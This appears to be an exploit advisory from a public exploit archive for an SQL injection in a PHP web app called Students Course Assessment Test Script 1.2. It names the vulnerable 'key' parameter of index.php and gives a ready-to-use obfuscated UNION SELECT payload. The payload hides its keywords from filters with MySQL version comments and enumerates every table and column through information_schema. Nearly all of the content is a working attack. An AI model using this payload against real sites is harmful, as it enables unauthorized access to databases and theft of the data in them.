27 lines
No EOL
988 B
Text
27 lines
No EOL
988 B
Text
# # # # #
|
|
# Exploit Title: Students Course Assessment Test Script 1.2 - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 13.09.2017
|
|
# Vendor Homepage: http://www.icloudcenter.com/
|
|
# Software Link: http://www.icloudcenter.com/student-course-assessment-test-script.htm
|
|
# Demo: http://icloudcenter.net/demos/icstudents/
|
|
# Version: 1.2
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Social: @ihsansencan
|
|
# # # # #
|
|
# Description:
|
|
# The vulnerability allows an attacker to inject sql commands....
|
|
#
|
|
# Proof of Concept:
|
|
#
|
|
# http://localhost/[PATH]/index.php?page=static_page&key=[SQL]
|
|
#
|
|
# -EfE'+/*!00009UniOn*/+/*!00009SelEcT*/+0x31,0x32,0x3c68313e494853414e2053454e43414e3c2f68313e,(/*!00009Select*/+export_set(5,@:=0,(/*!00009select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00009table_name*/,0x3c6c693e,2),/*!00009column_name*/,0xa3a,2)),@,2))--+-
|
|
#
|
|
# Etc..
|
|
# # # # # |